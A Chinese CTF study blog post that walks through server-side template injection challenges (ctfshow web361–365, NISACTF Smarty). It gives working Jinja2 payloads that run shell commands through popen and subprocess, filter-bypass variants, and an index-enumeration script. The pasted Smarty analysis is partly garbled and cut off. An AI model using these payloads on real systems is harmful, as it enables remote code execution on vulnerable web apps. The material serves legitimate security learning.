<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="google-site-verification=1l-Ncv0xIlzPx6dkZdorprb8MU59sYp-f3JtihJKCaM">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/silver/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.22.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"show_result":true,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>


    <meta name="description" content="从纯新手角度写写怎么做SSTI题 两个阶段目标：1.找到我要的类 2.执行命令 找到我要的类 分为两步 1. 找到object类 2.再往下找要的类（写脚本">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI集中学习题目汇总">
<meta property="og:url" content="http://example.com/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/index.html">
<meta property="og:site_name" content="CTF学习笔记">
<meta property="og:description" content="从纯新手角度写写怎么做SSTI题 两个阶段目标：1.找到我要的类 2.执行命令 找到我要的类 分为两步 1. 找到object类 2.再往下找要的类（写脚本">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/20230226102815-3922049c-b57d-1.png">
<meta property="article:published_time" content="2025-03-01T06:31:35.000Z">
<meta property="article:modified_time" content="2025-03-05T13:35:11.312Z">
<meta property="article:author" content="温柔刀">
<meta property="article:tag" content="笔记">
<meta property="article:tag" content="SSTI">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/20230226102815-3922049c-b57d-1.png">


<link rel="canonical" href="http://example.com/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/","path":"2025/03/01/SSTI集中学习题目汇总/","title":"SSTI集中学习题目汇总"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>SSTI集中学习题目汇总 | CTF学习笔记</title>
  







<link rel="dns-prefetch" href="comment-three-tau.vercel.app">
  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">CTF学习笔记</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-schedule"><a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a></li><li class="menu-item menu-item-commonweal"><a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">



    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ctfshow-web361"><span class="nav-number">1.</span> <span class="nav-text">ctfshow web361</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E6%95%B0%E5%AD%97-web362"><span class="nav-number">2.</span> <span class="nav-text">过滤数字 web362</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E5%AD%97%E5%9E%8B%E7%BB%95%E8%BF%87"><span class="nav-number">2.1.</span> <span class="nav-text">数字型绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%94%A8%E5%85%B6%E4%BB%96%E7%9A%84%E7%B1%BB"><span class="nav-number">2.2.</span> <span class="nav-text">用其他的类</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#subprocess-Popen"><span class="nav-number">2.2.1.</span> <span class="nav-text">subprocess.Popen()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#frozen-importlib-external-FileLoader"><span class="nav-number">2.2.2.</span> <span class="nav-text">_frozen_importlib_external.FileLoader</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#lipsum%EF%BC%88flask%EF%BC%89"><span class="nav-number">2.2.3.</span> <span class="nav-text">lipsum（flask）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#builtins"><span class="nav-number">2.2.4.</span> <span class="nav-text">builtins</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E5%8D%95%E5%8F%8C%E5%BC%95%E5%8F%B7-web363"><span class="nav-number">3.</span> <span class="nav-text">过滤单双引号 web363</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E5%BC%95%E5%8F%B7-args-web364"><span class="nav-number">4.</span> <span class="nav-text">过滤引号+args web364</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4-web365"><span class="nav-number">5.</span> <span class="nav-text">过滤[] web365</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#GWCTF-2019-%E4%BD%A0%E7%9A%84%E5%90%8D%E5%AD%97"><span class="nav-number">6.</span> <span class="nav-text">[GWCTF 2019]你的名字</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NISACTF-2022-midlevel"><span class="nav-number">7.</span> <span class="nav-text">[NISACTF 2022]midlevel</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SSTI-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-ds"><span class="nav-number">7.0.1.</span> <span class="nav-text">SSTI 漏洞分析(ds)</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-SERVER-HTTP-X-FORWARDED-FOR-%E5%8F%AF%E6%8E%A7"><span class="nav-number">7.0.1.1.</span> <span class="nav-text">1. $_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;] 可控</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#VNCTF-%E5%AD%A6%E7%94%9F%E5%A7%93%E5%90%8D%E7%99%BB%E8%AE%B0%E7%B3%BB%E7%BB%9F"><span class="nav-number">8.</span> <span class="nav-text">VNCTF 学生姓名登记系统</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%AB%E9%97%AE%E6%88%91%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E6%A1%86%E6%9E%B6%E6%98%AFbottle%E7%9A%84%E6%88%91%E4%B9%9F%E4%B8%8D%E7%9F%A5%E9%81%93"><span class="nav-number">9.</span> <span class="nav-text">别问我怎么知道框架是bottle的我也不知道</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="温柔刀"
      src="/images/avatar_2.gif">
  <p class="site-author-name" itemprop="name">温柔刀</p>
  <div class="site-description" itemprop="description">JNU_WEB</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">56</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">47</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/Gent1eknife" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Gent1eknife" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>

        </div>
      </div>
    </div>


    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar_2.gif">
      <meta itemprop="name" content="温柔刀">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CTF学习笔记">
      <meta itemprop="description" content="JNU_WEB">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="SSTI集中学习题目汇总 | CTF学习笔记">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SSTI集中学习题目汇总
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-03-01 14:31:35" itemprop="dateCreated datePublished" datetime="2025-03-01T14:31:35+08:00">2025-03-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-03-05 21:35:11" itemprop="dateModified" datetime="2025-03-05T21:35:11+08:00">2025-03-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Web/" itemprop="url" rel="index"><span itemprop="name">Web</span></a>
        </span>
    </span>

  
  
  <span class="post-meta-item">
    
    <span class="post-meta-item-icon">
      <i class="far fa-comment"></i>
    </span>
    <span class="post-meta-item-text">Waline：</span>
  
    <a title="waline" href="/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/#waline" itemprop="discussionUrl">
      <span class="post-comments-count waline-comment-count" data-path="/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>2.4k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>9 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>从纯新手角度写写怎么做SSTI题</p>
<p>两个阶段目标：1.找到我要的类 2.执行命令</p>
<p>找到我要的类 分为两步 1. 找到object类 2.再往下找要的类（写脚本</p>
<span id="more"></span>

<h1 id="ctfshow-web361"><a href="#ctfshow-web361" class="headerlink" title="ctfshow web361"></a>ctfshow web361</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&quot;&quot;.__class__.__mro__[-1].__subclasses__()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>已经完成找到object类 ，往下找会出现很多很多的类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&quot;&quot;.__class__.__mro__[-1].__subclasses__()[i]&#125;</span><br></pre></td></tr></table></figure>

<p>会出现不一样的类</p>
<p>那么写一个脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> html</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> quote</span><br><span class="line"><span class="keyword">import</span> urllib3</span><br><span class="line"></span><br><span class="line">urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">200</span>):</span><br><span class="line">    param = <span class="string">&quot;&#123;&#123;%22%22.__class__.__mro__[-1].__subclasses__()[&quot;</span>+<span class="string">f&quot;<span class="subst">&#123;i&#125;</span>&quot;</span>+<span class="string">&quot;]&#125;&#125;&quot;</span></span><br><span class="line">    url = <span class="string">f&quot;https://beb946ec-07b3-4f06-af0a-983aa96cdde7.challenge.ctf.show/?name=<span class="subst">&#123;param&#125;</span>&quot;</span></span><br><span class="line">    response = requests.get(url,verify=<span class="literal">False</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;wrap&quot;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">        <span class="built_in">print</span>(i)</span><br><span class="line">        <span class="built_in">print</span>(response.text)</span><br></pre></td></tr></table></figure>

<p>得到</p>
<p>132</p>
<pre><code>&lt;div class=&quot;center-content error&quot;&gt;
    &lt;h1&gt;Hello&lt;/h1&gt;
    &lt;h3&gt;&amp;lt;class &amp;#39;os._wrap_close&amp;#39;&amp;gt;&lt;/h3&gt;
&lt;/div&gt; 
</code></pre>
<p>最终payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://beb946ec-07b3-4f06-af0a-983aa96cdde7.challenge.ctf.show/?name=&#123;&#123;&quot;&quot;.__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__[&#x27;popen&#x27;](&#x27;cat /flag&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.__init__.__globals__[&#x27;popen&#x27;](&#x27;cat /flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<p>这段哪来的不要问我，我还没学明白</p>
<h1 id="过滤数字-web362"><a href="#过滤数字-web362" class="headerlink" title="过滤数字 web362"></a>过滤数字 web362</h1><p>过滤了数字2,3等</p>
<h2 id="数字型绕过"><a href="#数字型绕过" class="headerlink" title="数字型绕过"></a>数字型绕过</h2><p>132&#x3D;140-8&#x3D;114%2b18&#x3D;11*11%2b+11（+号在url中＝空格所以写成%2b）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">经过测试过滤了数字使用&#123;% set num=&#x27;aaaaaaaaaa&#x27;|length*&#x27;aaaaaaaaaaaaaa&#x27;|length-&#x27;aaaaaaaa&#x27;|length %&#125; 让num=132，从而实现绕过 payload： name=&#123;% set num=&#x27;aaaaaaaaaa&#x27;|length*&#x27;aaaaaaaaaaaaaa&#x27;|length-&#x27;aaaaaaaa&#x27;|length %&#125;&#123;&#123;().class.base.subclasses()[num].init.globals[&#x27;popen&#x27;](&#x27;cat /flag&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>这是一个 <strong>纯字符计算数值</strong> 的技巧，目的是绕过 <strong>数字过滤</strong>。我们来拆解它的计算过程：</p>
<ul>
<li><code>&#39;aaaaaaaaaa&#39;|length</code> &#x3D; 10（因为 <code>&#39;aaaaaaaaaa&#39;</code> 有 10 个字符）</li>
<li><code>&#39;aaaaaaaaaaaaaa&#39;|length</code> &#x3D; 14（因为 <code>&#39;aaaaaaaaaaaaaa&#39;</code> 有 14 个字符）</li>
<li><code>&#39;aaaaaaaa&#39;|length</code> &#x3D; 8（因为 <code>&#39;aaaaaaaa&#39;</code> 有 8 个字符）</li>
</ul>
<p>计算：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python复制编辑num = 10 * 14 - 8</span><br><span class="line">    = 140 - 8</span><br><span class="line">    = 132</span><br></pre></td></tr></table></figure>

<h2 id="用其他的类"><a href="#用其他的类" class="headerlink" title="用其他的类"></a>用其他的类</h2><h3 id="subprocess-Popen"><a href="#subprocess-Popen" class="headerlink" title="subprocess.Popen()"></a>subprocess.Popen()</h3><h3 id="frozen-importlib-external-FileLoader"><a href="#frozen-importlib-external-FileLoader" class="headerlink" title="_frozen_importlib_external.FileLoader"></a>_frozen_importlib_external.FileLoader</h3><p>没懂</p>
<h3 id="lipsum（flask）"><a href="#lipsum（flask）" class="headerlink" title="lipsum（flask）"></a>lipsum（flask）</h3><p>使用 lipsum 方法。这个是 flask 的内置方法，自带 os 模块</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;lipsum.__globals__.get(&#x27;os&#x27;).popen(&#x27;cat /flag&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="builtins"><a href="#builtins" class="headerlink" title="builtins"></a>builtins</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;&#x27;.class.base.subclasses()[104].init.globals[&#x27;__builtins__&#x27;]&#x27;eval&#x27;&#125;&#125;</span><br></pre></td></tr></table></figure>



<h1 id="过滤单双引号-web363"><a href="#过滤单双引号-web363" class="headerlink" title="过滤单双引号 web363"></a>过滤单双引号 web363</h1><p>过滤单双引号，考虑使用get传参绕过</p>
<p><strong>payload</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;().__class__.__mro__[1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]&#125;&#125;&amp;a=cat /flag</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;().__class__.__bases__[0].__subclasses__()[132].__init__.__globals__[request.args.popen](request.args.param).read()&#125;&#125;&amp;popen=popen&amp;param=cat+/flag</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;().__class__.__base__.<span class="title function_ invoke__">__subclasses__</span>()[<span class="number">132</span>].__init__.__globals__[request.args.a](request.args.b).<span class="title function_ invoke__">read</span>()&#125;&#125;&amp;a=popen&amp;b=cat /flag</span><br></pre></td></tr></table></figure>



<h1 id="过滤引号-args-web364"><a href="#过滤引号-args-web364" class="headerlink" title="过滤引号+args web364"></a>过滤引号+args web364</h1><p>过滤args，可以用cookies</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;().__class__.__bases__[0].__subclasses__()[132].__init__.__globals__[request.cookies.p](request.cookies.param).read()&#125;&#125;`</span><br><span class="line">cookies</span><br><span class="line"></span><br><span class="line">`Cookie: p=popen; param=cat /flag`</span><br></pre></td></tr></table></figure>

<h1 id="过滤-web365"><a href="#过滤-web365" class="headerlink" title="过滤[] web365"></a>过滤[] web365</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">三种方法，但都需要用到python魔术方法getitem</span><br><span class="line"></span><br><span class="line">方法一： &#123;%set char=config.**class**.**init**.**globals**.**builtins**.chr%&#125;&#123;&#123;().**class**.**base**.**subclasses**().**getitem**(132).**init**.**globals**.popen(char(108)%2bchar(115)).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">方法二： name=&#123;&#123;().class.base.subclasses().getitem(132).init.globals.getitem(request.cookies.x1)(request.cookies.x2).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">然后将cookie写入 Cookie: x1=popen; x2=cat /flag</span><br><span class="line"></span><br><span class="line">方法三： 使用subprocess.Popen类 &#123;&#123;().**class**.**mro**.**getitem**(1).**subclasses**().**getitem**(407)(request.values.a,shell=True,stdout=-1).communicate().**getitem**(0)&#125;&#125;&amp;a=cat /flag</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p><a target="_blank" rel="noopener" href="https://drinkflower.asia/wordpress/archives/441">严格过滤下的SSTI注入</a></p>
<h1 id="GWCTF-2019-你的名字"><a href="#GWCTF-2019-你的名字" class="headerlink" title="[GWCTF 2019]你的名字"></a>[GWCTF 2019]你的名字</h1><h1 id="NISACTF-2022-midlevel"><a href="#NISACTF-2022-midlevel" class="headerlink" title="[NISACTF 2022]midlevel"></a>[NISACTF 2022]midlevel</h1><img src="/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/20230226102815-3922049c-b57d-1.png" class="" title="20230226102815-3922049c-b57d-1">

<p>Smarty漏洞成因：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/smarty-php/smarty/blob/fa269d418fb4d3687558746e67e054c225628d13/libs/sysplugins/smarty_internal_write_file.php#L16">https://github.com/smarty-php/smarty/blob/fa269d418fb4d3687558746e67e054c225628d13/libs/sysplugins/smarty_internal_write_file.php#L16</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">require_once</span>(<span class="string">&#x27;./smarty/libs/&#x27;</span> . <span class="string">&#x27;Smarty.class.php&#x27;</span>);</span><br><span class="line">    <span class="variable">$smarty</span> = <span class="keyword">new</span> <span class="title class_">Smarty</span>();</span><br><span class="line">    <span class="variable">$ip</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>];</span><br><span class="line">    <span class="variable">$smarty</span>-&gt;<span class="title function_ invoke__">display</span>(<span class="string">&quot;string:&quot;</span>.<span class="variable">$ip</span>);     <span class="comment">// display函数把标签替换成对象的php变量；显示模板</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这段 PHP 代码的关键漏洞点在于 <strong>SSTI（服务器端模板注入）</strong>，主要问题出现在这一行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$smarty-&gt;display(&quot;string:&quot;.$ip);</span><br></pre></td></tr></table></figure>

<blockquote>
<h3 id="SSTI-漏洞分析-ds"><a href="#SSTI-漏洞分析-ds" class="headerlink" title="SSTI 漏洞分析(ds)"></a><strong>SSTI 漏洞分析</strong>(ds)</h3><hr>
<h4 id="1-SERVER-HTTP-X-FORWARDED-FOR-可控"><a href="#1-SERVER-HTTP-X-FORWARDED-FOR-可控" class="headerlink" title="1. $_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;] 可控"></a><strong>1. <code>$_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;]</code> 可控</strong></h4><ul>
<li><pre><code>$_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;]
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">是 HTTP 请求头字段，攻击者可以通过伪造请求头来控制其值，比如：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
css


复制编辑
X-Forwarded-For: &#123;payload&#125;
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">这样，</span><br><span class="line"></span><br></pre></td></tr></table></figure>
$ip
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">   变量的值就可以被攻击者控制。</span><br><span class="line"></span><br><span class="line">#### **2. `display(&quot;string:&quot;.$ip)` 直接解析输入**</span><br><span class="line"></span><br><span class="line">- `Smarty` 允许 `display(&quot;string:xxx&quot;)` 解析 **Smarty 模板语法**，意味着 `$ip` 变量的值如果包含 Smarty 语法，**Smarty 会执行模板中的代码**。</span><br><span class="line"></span><br><span class="line">#### **3. 攻击利用**</span><br><span class="line"></span><br><span class="line">- 假设攻击者发送如下请求：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
scss


复制编辑
X-Forwarded-For: &#123;*phpinfo()*&#125;
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">代码执行后，相当于：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
php


复制编辑
